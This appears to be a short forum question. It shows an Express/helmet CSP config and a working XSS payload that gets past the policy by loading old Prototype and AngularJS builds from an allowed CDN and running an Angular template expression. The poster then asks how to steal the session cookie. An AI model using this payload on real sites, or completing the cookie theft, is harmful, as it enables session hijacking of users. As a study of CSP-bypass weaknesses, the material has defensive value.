26 Apr
Overcoming Cookie Theft Barrier in XSS Attack despite CSP Implementation
I have a website that includes these CSP rules (set with the helmet middleware):
    const express = require("express");
    const helmet = require("helmet");

    const app = express();
    app.use(
      helmet.contentSecurityPolicy({
        directives: {
          defaultSrc: ["'self'"],
          // any script served from this host is allowed, whatever library it is
          scriptSrc: ["'self'", "cdnjs.cloudflare.com"],
        },
      })
    );
I successfully executed an XSS attack in an input field and bypassed the CSP by:
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" />.
</SCRIPT>
<div ng-app ng-csp style="display:none;">
{{$on.curry.call().alert('xss')}}
</div>
However, when attempting to steal the cookie, I ran into an issue. I tried to access the cookie using document.cookie, but it didn't work as expected. Instead, I received 'undefined' when simply attempting to alert 'document'.
I tried: {{$on.curry.call().alert(document.cookie)}}
but it did not work. How can I successfully steal the cookie in this scenario?